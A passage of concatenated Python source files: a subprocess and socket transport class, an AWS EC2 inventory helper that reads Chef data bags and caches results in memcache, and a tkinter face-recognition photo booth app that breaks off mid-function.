stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
shell=False,
bufsize=0,
startupinfo=startupinfo,
cwd = cwd)
self.stdin = self.process.stdin
self.stderr = self.process.stderr
self.stdout = self.process.stdout
self.closed = False
def _readline(self, pipe) -> bytes:
if l := pipe.readline():
return l
raise EOFError
def _read(self, pipe, n: int) -> bytes:
if l := pipe.read(n):
return l
raise EOFError
async def readline(self, pipe) -> bytes:
return await core.run_in_executor(lambda: self._readline(pipe))
async def read(self, pipe, nbytes) -> bytes:
return await core.run_in_executor(lambda: self._read(pipe, nbytes))
def dispose(self):
self.closed = True
try:
self.process.terminate()
except Exception as e:
core.log_exception()
class StdioTransport(Transport):
def __init__(self, log: core.Logger, command: List[str], cwd: Optional[str] = None):
self.process = Process(command, cwd)
thread = threading.Thread(target=self._read, args=(self.process.stderr, log.info))
thread.start()
def _read(self, file: Any, callback: Callable[[str], None]) -> None:
while True:
try:
line = file.read(2**15).decode('UTF-8')
if not line:
core.log_info("Nothing to read from process, closing")
break
core.call_soon_threadsafe(callback, line)
except Exception as e:
core.log_exception()
break
self.process.dispose()
def write(self, message: bytes) -> None:
self.process.stdin.write(message)
self.process.stdin.flush()
def readline(self) -> bytes:
if l := self.process.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.process.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
self.process.dispose()
class SocketTransport(Transport):
def __init__(self, log: core.Logger, host: str, port: int, cwd: Optional[str] = None):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((host, port))
self.stdin = self.socket.makefile('wb')
self.stdout = self.socket.makefile('rb')
def write(self, message: bytes) -> None:
self.stdin.write(message)
self.stdin.flush()
def readline(self) -> bytes:
if l := self.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
try:
self.socket.close()
except:
core.log_exception()
|
aws_helper.py
|
import os, sys, collections
import boto, boto.ec2
from atlas_helper_methods import *
import re, datetime
import memcache, collections
from concurrent.futures import ThreadPoolExecutor
import chef
from chef import DataBag, DataBagItem
from chef import DataBagItem
from dateutil import parser
from dateutil import tz
from collections import OrderedDict, defaultdict
import threading
class AwsHelper:
def __init__(self):
self.ah_obj = AtlasHelper()
self.module = "aws_module"
self.instance_info = []
self.env_subnet_dict={}
self.environment_dict = {}
self.memcache_var = memcache.Client([self.ah_obj.get_atlas_config_data("global_config_data",'memcache_server_location')], debug=0)
self.environment_details = {}
self.regions_for_env_dict = {}
def get_databag_attributes(self, atlas_set_header, databag_set_name):
"""
Returns all items of a databag given the header and databag name in the atlas config file.
"""
data_bag_attr = {}
base_path = self.ah_obj.get_atlas_config_data("chef_module", 'chef-base-path')
api = chef.autoconfigure(base_path)
chef_databags = self.ah_obj.get_atlas_config_data(atlas_set_header, databag_set_name)[1]
for databag in chef_databags.keys():
data_bag = DataBag(databag,api)
key_list = {}
items = chef_databags[databag]['items'].keys()
for item_index in items:
key_list = chef_databags[databag]['items'][item_index]['keys']
chef_databag_item = DataBagItem(databag,item_index,api)
for item_keys, item_values in chef_databag_item.iteritems():
if item_keys in key_list:
data_bag_attr[item_keys] = item_values
elif type(item_values) == dict:
data_bag_attr[item_keys] = {}
for key in key_list:
attr_values = self.ah_obj.get_nested_attribute_values(item_values, key)
data_bag_attr[item_keys][key] = attr_values
return data_bag_attr
def get_databag_attrs_fromcache(self, atlas_set_header, databag_set_name):
"""
Check in short term cache if not fetch from long term cache
"""
db_attribute_dict = self.memcache_var.get('atlas_yaml')
if not db_attribute_dict:
db_attribute_dict = self.memcache_var.get('global_atlas_yaml')
if db_attribute_dict is not None:
self.memcache_var.set("atlas_yaml", db_attribute_dict, 10800)
with threading.Lock():
thread = threading.Thread(target=self.cache_databag_attributes, args=[atlas_set_header, databag_set_name])
thread.start()
return db_attribute_dict
def cache_databag_attributes(self, atlas_set_header, databag_set_name):
"""
Fetch databag attributes from chef server using keys defined in atlas configuration file and cache it locally.
"""
try:
databag_attribute_dict = self.get_databag_attributes(atlas_set_header, databag_set_name)
if databag_attribute_dict is None:
raise Exception("The infrastructure data is not available. Please make sure you get the data from atlas.yaml and populate the cache !!!")
if databag_attribute_dict:
self.memcache_var.set("atlas_yaml", databag_attribute_dict, 15*60)
self.memcache_var.set("global_atlas_yaml",databag_attribute_dict, 24*60*60)
self.memcache_var.disconnect_all()
except:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "cache_databag_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def initialize_environments(self, organization, env_list):
"""
Construct an initial dictionary self.environment_dict.
"""
aws_variables = self.ah_obj.get_atlas_config_data(self.module, "status")[0]
self.regions_for_env_dict = self.regions_for_env()
for environment in env_list:
self.environment_dict['organizations'][organization]['environments'][environment] = {'regions':{}}
temp_env_regions = self.environment_dict['organizations'][organization]['environments'][environment]['regions']
region_list = self.regions_for_env_dict[environment]
for region in region_list:
if environment == 'uncategorized':
temp_env_regions[region] = {'uncat_instances': {}}
for variables in aws_variables:
temp_env_regions[region][variables]= 0
else:
temp_env_regions[region] = {'vpc':{}}
for variables in aws_variables:
temp_env_regions[region][variables]= 0
vpc_list = self.get_vpc_in_region(region)
if vpc_list:
for vpc in vpc_list:
if vpc:
temp_env_regions[region]['vpc'][vpc] = {'subnets':{}}
for variables in aws_variables:
temp_env_regions[region]['vpc'][vpc][variables]= 0
subnets = self.get_subnets_in_environment(region, vpc,environment)
for subnet in subnets:
temp_env_regions[region]['vpc'][vpc]['subnets'][subnet] = {'instances':{}}
self.env_subnet_dict[(subnet, vpc, region)]=environment
def initialize_instance_dictionary(self):
"""
Initialize the dictionary.
"""
env_list=[]
self.environment_dict = {'organizations':{}}
try:
for organization in self.get_organizations():
self.environment_dict['organizations'] = {organization : {'environments':{}}}
env_list = self.get_environments(organization)
env_list.append('uncategorized');
self.initialize_environments(organization, env_list)
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "initialize_instance_dictionary()", exp_object, exc_type, exc_obj, exc_tb)
return
def parse_application_name(self, instance_name):
"""
a dictionary for regex patterns for instance names
this should be moved to the configuration file
"""
application_regex_dictionary = self.ah_obj.get_atlas_config_data(self.module, "instances-regex")[1]
# by iterating through the dictionary we can determine if an instance runs an application
for key, values in application_regex_dictionary.iteritems():
for pattern in values:
if re.match("^"+pattern+"$", instance_name):
return key
return "uncategorized"
def get_duration(self, instance):
"""
Get duration or uptime of an instance .
"""
duration = instance.__dict__.get("launch_time")
local_time_duration = datetime.datetime.now().replace(tzinfo=tz.tzlocal())-parser.parse(str(duration)).astimezone(tz.tzlocal())
return local_time_duration
def timedelta_to_duration(self,timedelta):
"""
this method receives date information in timedelta format
the hours, minutes and seconds are retrieved in hours, minutes and seconds
"""
return str(timedelta.days)+"d "+str(timedelta.seconds//3600)+"h "+str((timedelta.seconds//60)%60)+"m"
def count_return_state(self, instances, count_dict):
"""
Count the number of instances based on _state.
"""
instance_state=""
try:
count_dict['count']+=1;
if str(instances.__dict__.get('_state', 'none')) == "running(16)":
instance_state = "running"
count_dict['running']+=1;
if str(instances.__dict__.get('_state', 'none')) == 'stopped(80)':
instance_state="stopped"
count_dict['stopped']+=1;
return instance_state
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("awshelper.py", "count_return_state()", exp_object, exc_type, exc_obj, exc_tb)
return "None"
def cache_aws_instances_information(self):
"""
Cache the instances information using memcache.
"""
try:
aws_inst_dict = self.get_aws_instances_information()
self.memcache_var.set("aws_instances_details_cache", aws_inst_dict,60*60)
if aws_inst_dict is None:
raise Exception('AWS instance data is empty. Please check if data is available from AWS and populate the cache !!!')
if aws_inst_dict is not None:
self.memcache_var.set("global_aws_cache", aws_inst_dict,86400)
self.memcache_var.disconnect_all()
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("awshelper.py", "cache_aws_instances_information()", exp_object, exc_type, exc_obj, exc_tb)
self.memcache_var.disconnect_all()
def get_instances_details(self):
"""
Get details of all instances.
"""
instance_details = self.memcache_var.get("aws_instances_details_cache")
self.memcache_var.disconnect_all()
if not instance_details:
instance_details = self.memcache_var.get("global_aws_cache")
if instance_details is not None:
self.memcache_var.set('aws_instances_details_cache', instance_details,2*60*60)
with threading.Lock():
thread = threading.Thread(target=self.cache_aws_instances_information)
thread.start()
return instance_details
def get_aws_instances_information(self):
try:
self.initialize_instance_dictionary()
organizations_list = self.get_organizations();
instances_list = []
if organizations_list:
for organization in organizations_list:
region_list = self.get_regions()
for region in region_list:
conn_obj = self.get_aws_connection(region)
instances_list = self.get_aws_instances(conn_obj)
images_list = conn_obj.get_all_images()
aws_images_dict = {}
for image in images_list:
aws_images_dict[image.id] = image
with ThreadPoolExecutor(max_workers=3) as executor:
future = executor.submit(self.fetch_awsinstance_info, organization, region, region_list, instances_list, aws_images_dict, conn_obj)
self.memcache_var.set("aws_instances_details_cache", self.environment_dict)
self.memcache_var.disconnect_all()
return self.environment_dict
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("helper.py", "get_aws_instances_information()", exp_object, exc_type, exc_obj, exc_tb)
return
def fetch_awsinstance_info(self, organization, region, region_list, instances_list, aws_images_dict, conn_obj):
"""
Fetch and parse all instances information to create aws information dictionary object.
"""
try:
for instances in instances_list:
#read knife tags and atlas tags
knife_tags = instances.tags.get('knife_tags');
atlas_tags = {} #should read through boto in the future
aws_instance_name = ""
if knife_tags:
vpc = knife_tags['vpc'];
instance_subnet = knife_tags['subnet']
application_name = knife_tags['stack']
instance_name = knife_tags['hostname']
#else get attributes from atlas tags
elif atlas_tags:
pass
else:
#use other aws tags or parse the instance name to get instance attributes
vpc_id = str(instances.__dict__.get('vpc_id', 'none'))
vpc = self.get_vpc_by_id(vpc_id, region)
instance_subnet = "none"
environment=""
if vpc:
subnet_id = str(instances.__dict__.get('subnet_id'))
if subnet_id:
instance_subnet = self.get_subnet_byid(subnet_id, region, vpc)
else:
instance_subnet ='none'
aws_instance_name = re.split('[:,.;_-]', instances.tags.get('Name', 'none'))
instance_name = aws_instance_name[2] if len(aws_instance_name)==3 else instances.tags.get('Name', 'none')
application_name = self.parse_application_name(instance_name)
stack_list = self.get_stack()
if (instance_subnet,vpc,region) in self.env_subnet_dict.keys():
environment=self.env_subnet_dict[(instance_subnet, vpc, region)]
env_regions = self.regions_for_env_dict[environment]
else:
environment = "uncategorized"
env_regions = region_list
if region not in env_regions:
pass
else:
#read other instance tags
instance_tags = instances.tags
instance_id = instances.__dict__['id']
instance_type = instances.__dict__['instance_type']
instance_ip_address = instances.__dict__['private_ip_address']
image_id = instances.__dict__['image_id']
image_name = ""
if image_id in aws_images_dict:
image_name = aws_images_dict[image_id].name
instance_attribute_dict = collections.defaultdict(dict)
instance_attribute_dict['region'] = region
instance_attribute_dict['vpc'] = vpc
instance_attribute_dict['subnet'] = instance_subnet
instance_attribute_dict['instance_id'] = instance_id
instance_attribute_dict['instance'] = instance_name
instance_attribute_dict['application'] = application_name
instance_attribute_dict['instance_type'] = instance_type
aws_information_dict = collections.defaultdict(dict)
aws_information_dict['instance_id'] = instance_id
aws_information_dict['instance_type'] = instance_type
aws_information_dict['private_ip_addr'] = instance_ip_address
aws_information_dict['image_id'] = image_id
aws_information_dict['image_name'] = image_name
aws_tags = instance_tags
if not vpc or instance_subnet == 'none' or application_name == 'uncategorized':
environment = 'uncategorized'
uncategorized_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]
instance_attribute_dict['status'] = self.count_return_state(instances, uncategorized_dict)
uncategorized_dict['uncat_instances'][instance_name] = {'instance_attributes' : {}, 'aws_information':{}}
uncategorized_dict['uncat_instances'][instance_name]['instance_attributes'] = dict(instance_attribute_dict)
uncategorized_dict['uncat_instances'][instance_name]['aws_information'] = dict(aws_information_dict)
uncategorized_dict['uncat_instances'][instance_name]['aws_tags'] = aws_tags
instance_attribute_dict['duration'] = self.timedelta_to_duration(self.get_duration(instances))
else:
#if vpc and instance_subnet <>'none':
environment_subnets = self.get_subnets_in_environment(region, vpc, environment)
if instance_subnet in environment_subnets:
count_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]
self.count_return_state(instances, count_dict)
count_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]['vpc'][vpc]
instance_attribute_dict['status'] = self.count_return_state(instances, count_dict)
instance_attribute_dict['duration'] = self.timedelta_to_duration(self.get_duration(instances))
#create attribute list for each instance running the application for each subnet
stack_subnet_dict = self.environment_dict['organizations'][organization]['environments'][environment]['regions'][region]['vpc'][vpc]['subnets']
if application_name in stack_list:
if instance_subnet not in stack_subnet_dict.keys():
stack_subnet_dict[instance_subnet] = {'instances':{}} #subnets in which the application runs
stack_subnet_dict[instance_subnet]['instances'][instance_name] = {'instance_attributes' : {}, 'aws_information':{}}
stack_subnet_dict[instance_subnet]['instances'][instance_name]['instance_attributes']=dict(instance_attribute_dict)
stack_subnet_dict[instance_subnet]['instances'][instance_name]['aws_information'] = dict(aws_information_dict)
stack_subnet_dict[instance_subnet]['instances'][instance_name]['aws_tags'] = aws_tags
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("awshelper.py", "fetch_aws_instance_info()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_organizations(self):
"""
Fetch all organizations.
"""
try:
(organizations, org_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "organizations")
return organizations
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_organizations()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_org_attributes(self):
"""
Fetch attributes of all organization.
"""
try:
(organization, org_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "organizations")
return org_attributes
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_org_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_attributes_for_organization(self, org_name):
"""
Fetch attributes when a particular organization name is given.
"""
try:
(organization, org_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "organizations")
if org_name in organization:
return org_attributes[org_name]
else:
raise Exception ("Organization not found!!")
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_org_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_regions(self):
"""
Return a list of regions.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_regions()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_region_attributes(self):
"""
Return a dictionary of attributes of all regions.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")[1]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_region_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_attributes_for_region(self, region_name):
"""
Returns the attributes of region given the region name
"""
try:
(regions, region_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")
if region_name in regions:
return region_attributes[region_name]
else:
return {}
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_attributes_for_region()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_region_id(self, region):
"""
Return region id given region name.
"""
region_id = ""
try:
region_attr = self.get_attributes_for_region(region)
if "id" in region_attr.keys():
region_id = region_attr["id"]
else:
region_id = region
return region_id
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_attributes_for_region()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_vpc_in_region(self, region_name):
"""
Return the vpcs in a region given a region.
"""
try:
vpc_list = []
(regions, region_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")
if region_name in regions:
if 'vpc' in region_attributes[region_name]:
vpc_list = region_attributes[region_name]['vpc'].keys()
if vpc_list is not None:
return vpc_list
else:
pass
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_vpc_in_region()", exp_object, exc_type, exc_obj, exc_tb)
return ["none"]
def get_vpc_by_id(self, vpc_id, region_name):
"""
Returns the vpc id given the region name.
"""
try:
vpc_list = []
(regions, region_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "regions")
if region_name in regions:
if 'vpc' in region_attributes[region_name].keys():
(vpc_list, vpc_attributes) = self.ah_obj.get_nested_attribute_values(region_attributes[region_name],"vpc")
for vpc in vpc_list:
(vpc_keys, vpc_values) = self.ah_obj.get_nested_attribute_values(vpc_attributes, vpc)
if "vpcid" in vpc_keys:
if vpc_values["vpcid"] == vpc_id:
return vpc
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_vpc_in_region()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_subnet_list(self, region, vpc):
"""
Return all the list of subnets in a vpc in a given region.
"""
try:
region_attributes = self.get_attributes_for_region(region)
vpc_attributes = region_attributes[vpc]
return self.ah_obj.get_nested_attribute_values(vpc_attributes[vpc], "subnets")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_subnet_list()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_subnets_in_environment(self, region, vpc, environment):
"""
Return all the subnets belonging to an environment in a region and a vpc.
"""
subnet_list = []
try:
if environment == 'uncategorized':
return []
if not vpc:
return []
region_attributes = self.get_attributes_for_region(region)
if 'vpc' in region_attributes.keys():
vpc_attributes = region_attributes['vpc']
subnet_dict = self.ah_obj.get_nested_attribute_values(vpc_attributes[vpc], "subnets")[1]
for subnet, subnet_attr in subnet_dict.iteritems():
if 'env' in subnet_attr:
if subnet_attr['env'] == environment:
subnet_list.append(subnet)
return subnet_list
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_subnets_in_environment()", exp_object, exc_type, exc_obj, exc_tb)
return []
def get_subnet_byid(self, subnet_id, region, vpc):
try:
region_attributes = self.get_attributes_for_region(region)
if 'vpc' in region_attributes.keys():
vpc_attributes = region_attributes['vpc']
subnet_dict = self.ah_obj.get_nested_attribute_values(vpc_attributes[vpc], "subnets")[1]
for subnet, subnet_attr in subnet_dict.iteritems():
if subnet_attr['id'] == subnet_id:
return subnet
return
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_subnet_byid()", exp_object, exc_type, exc_obj, exc_tb)
return []
def get_stack(self):
"""
Returns a list of all stacks.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "stacks")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_stack()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_stack_attributes(self):
"""
Return the attribute values of all the stack entries.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "stacks")[1]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_stack_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_profiles_for_stack(self, stack_name):
"""
Returns the profiles associated with the stack.
"""
try:
(stack,stack_attributes) = self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "stacks")
if stack_name in stack:
profile_list = self.ah_obj.get_nested_attribute_values(stack_attributes[stack_name],"profiles")
return profile_list[0] if profile_list else []
else:
raise Exception ("Profile not found !!")
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_profiles_for_stack()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_profiles(self):
"""
Fetch a list of all profiles.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "profiles")[0]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_profiles()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_profile_attributes(self):
"""
Fetch profile attributes.
"""
try:
return self.ah_obj.get_nested_attribute_values(self.get_databag_attrs_fromcache("global_config_data", "atlas_yaml_databag"), "profiles")[1]
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_profile_attributes()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_environments(self, organization):
"""
Retrieve all environments given an organization name.
"""
try:
env_list = self.ah_obj.get_nested_attribute_values(self.get_org_attributes(), "env")[0]
return env_list
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_environments()", exp_object, exc_type, exc_obj, exc_tb)
return {}
def get_env_subnets(self, organization, region, vpc):
try:
env_subnet_dict = {}
environments = self.get_environments(organization)
for env in environments:
subnet_list = self.get_subnets_in_environment(region, vpc, env)
for subnet in subnet_list:
env_subnet_dict[subnet, vpc, region] = env
return env_subnet_dict
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_env_subnets()", exp_object, exc_type, exc_obj, exc_tb)
return
def regions_for_env(self):
"""
Return the regions in which an environment exists.
"""
region_dict = collections.defaultdict(dict)
try:
organizations_list = self.get_organizations()
for organization in organizations_list:
region_dict['uncategorized'] = self.get_regions()
region_list = self.get_regions()
for region in region_list:
region_attributes = self.get_attributes_for_region(region)
if 'vpc' in region_attributes.keys():
vpc_attributes = region_attributes['vpc']
for vpc in vpc_attributes.keys():
subnet_dict = self.ah_obj.get_nested_attribute_values(vpc_attributes, "subnets")[1]
for environment in self.get_environments(organization):
region_dict[environment] = []
for subnet, subnet_attr in subnet_dict.iteritems():
if subnet_attr.has_key("env"):
if subnet_attr['env'] == environment and region not in region_dict[environment]:
region_dict[environment].append(region)
return dict(region_dict)
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_regions_for_env()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_aws_connection(self, region):
"""
Return an AWS connection object.
"""
try:
region_id = self.get_region_id(region);
key_id = os.environ.get('AWS_ACCESS_KEY_ID')
secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
connection = boto.ec2.connect_to_region(region_id,aws_access_key_id=key_id,
aws_secret_access_key=secret_key)
return connection
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_aws_connection()", exp_object, exc_type, exc_obj, exc_tb)
return
def get_aws_instances(self, connection):
"""
Get all AWS instances.
"""
try:
all_reservations_list = connection.get_all_instances()
all_instances_list = [instances for reservations in all_reservations_list for instances in reservations.instances]
return all_instances_list
except Exception as exp_object:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("aws_helper.py", "get_aws_instances()", exp_object, exc_type, exc_obj, exc_tb)
return
#get all environments and corresponding subnets from json file
def get_environment_subnets_details(self):
try:
subnet_list = []
organization_list = self.get_organizations()
if organization_list is not None:
for organization in organization_list:
environment_list = self.get_environments(organization)
environment_list.append("uncategorized");
for environment in environment_list:
if environment == "uncategorized":
subnet_list.append(['none', '(not set)'])
region_list = self.get_regions()
if region_list is not None:
for region in region_list:
vpc_list= self.get_vpc_in_region(region)
if vpc_list is not None:
for vpc in vpc_list:
subnet_list.append(self.get_subnets_in_environment(region, vpc, environment))
return zip(environment_list, subnet_list)
except Exception as exp_object:
self.ah_obj = AtlasHelper()
exc_type, exc_obj, exc_tb = sys.exc_info()
self.ah_obj.print_exception("cloudability.py", "get_env_subnets()", exp_object, exc_type, exc_obj, exc_tb)
return ([],[])
def get_dash_environments(self):
"""
Get all environments for dashboard display.
"""
organizations = self.get_organizations()
environment_list=[]
environment_groups = self.ah_obj.get_atlas_config_data('global_config_data', 'environment_groups')
for organization in organizations:
environment_list = self.get_environments(organization)
for environment in environment_list:
if environment in environment_groups[0]:
for group_member in environment_groups[1][environment]:
if environment != group_member:
environment_list.remove(group_member)
environment_list.append('uncategorized')
environment_list.append('all')
return environment_list
|
photoboothapp.py
|
# import the necessary packages
import tkinter as tki
from PIL import Image
from PIL import ImageTk
import cv2
import threading
import imutils
import datetime
import os
import time
import traceback
import shutil
# FaceAnalyzer
import dlib
import numpy as np
import cv2
from keras.models import load_model
import glob
from imutils import face_utils
import fr_utils
import time
import tensorflow as tf
class PhotoBoothApp:
def __new__(cls, video_stream, outputPath):
if outputPath[0:2] == './':
return super(PhotoBoothApp, cls).__new__(cls)
else:
raise ValueError(' The output path must be in the current directory.')
def __init__(self, video_stream, outputPath):
# store the video stream object and output path, then initialize
# the most recently read frame, thread for reading frames, and
# the thread stop event
self.vs = video_stream
self.outputPath = outputPath
if not os.path.isdir(self.outputPath):
os.mkdir(self.outputPath)
self.face_analyzer = FaceAnalyzer(self.outputPath, self)
self.frame = None
self.thread = None
self.stopEvent = None
# initialize the root window and image panel
self.root = tki.Tk()
self.panel = None
self.buildTkInterface()
# start a thread that constantly pools the video sensor for
# the most recently read frame
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.videoLoop, args=())
self.thread.start()
def buildTkInterface(self):
# create a button, that when pressed, will take the current
# frame and save it to file
# set a callback to handle when the window is closed
self.root.wm_title("PyImageSearch PhotoBooth")
self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose)
btn = tki.Button(self.root, text="Snapshot!",
command=self.takeSnapshot)
btn.pack(side="bottom", fill="both", expand="yes", padx=10,
pady=10)
btn = tki.Button(self.root, text="Flush Database!",
command=self.flushDatabase)
btn.pack(side="bottom", fill="both", expand="yes", padx=10,
pady=10)
tki.Label(self.root, text= 'Qui es tu ?').pack()
self.name_text = tki.StringVar()
self.name_widget = tki.Entry(self.root, textvariable = self.name_text)
self.name_widget.pack()
self.alert_text = tki.StringVar()
self.alert_widget = tki.Label(self.root, textvariable = self.alert_text)
self.alert_widget.pack()
self.listbox = tki.Listbox(self.root)
self.listbox.pack()
faces = [os.path.splitext(filename)[0] for filename in os.listdir(self.outputPath)]
[self.listbox.insert(tki.END,face) for face in faces]
def verifSnapshot(self, new_filename):
print(self.name_text)
if not os.path.isdir(self.outputPath):
return False
if new_filename == ".jpg":
self.alert_text.set("Tu as oublié le prénom ! >o<")
self.alert_widget.config(fg="red")
return False
if not os.path.isfile("./people/" + new_filename):
self.alert_text.set("Visage ajouté avec succès ! ^o^")
self.alert_widget.config(fg="green")
return True
else:
self.alert_text.set("Cette personne existe déja ! >o<")
self.alert_widget.config(fg="red")
return False
def flushDatabase(self):
if self.outputPath[0:2] == './':
shutil.rmtree(self.outputPath)
os.mkdir(self.outputPath)
self.alert_text.set("Base de données vidée ! 'v'")
self.alert_widget.config(fg="green")
self.listbox.delete(0, tki.END)
self.face_analyzer.reload_database()
def videoLoop(self):
try:
while not self.stopEvent.is_set():
(_, init_frame) = self.vs.read()
self.frame = imutils.resize(init_frame, width=300)
with graph.as_default():
frame_faces = self.face_analyzer.add_face_boxes()
image = cv2.cvtColor(frame_faces, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
if self.panel is None:
self.panel = tki.Label(image=image)
self.panel.image = image
self.panel.pack(side="left", padx=10, pady=10)
else:
self.panel.configure(image=image)
self.panel.image = image
self.root.quit()
print('[INFO] end of video thread.')
except Exception as e:
print(e)
traceback.print_exc()
print("[INFO] caught a RuntimeError")
self.root.quit()
def takeSnapshot(self):
name = self.name_widget.get()
filename = "{}.jpg".format(name)
if self.verifSnapshot(filename):
p = os.path.sep.join((self.outputPath, filename))
# save the file
face = self.face_analyzer.get_soloface_image()
cv2.imwrite(p, face)
print("[INFO] saved {}".format(filename))
self.listbox.insert(tki.END, name)
self.face_analyzer.reload_database()
def onClose(self):
print("[INFO] closing...")
self.stopEvent.set()
time.sleep(1)
self.root.quit()
class FaceAnalyzer:
def __init__(self, outputPath, photobooth_app):
self.outputPath = outputPath
self.database = {}
self.FRmodel = load_model('face-rec_Google.h5')
global graph
graph = tf.get_default_graph()
self.detector = dlib.get_frontal_face_detector()
self.photobooth_app = photobooth_app
self.reload_database()
def reload_database(self):
self.database = {}
# load all the images of individuals to recognize into the database
for photo_filename in glob.glob("%s/*" % (self.outputPath)):
photo_object = cv2.imread(photo_filename)
identity = os.path.splitext(os.path.basename(photo_filename))[0]
self.database[identity] = fr_utils.img_path_to_encoding(photo_filename, self.FRmodel)
def add_face_boxes(self):
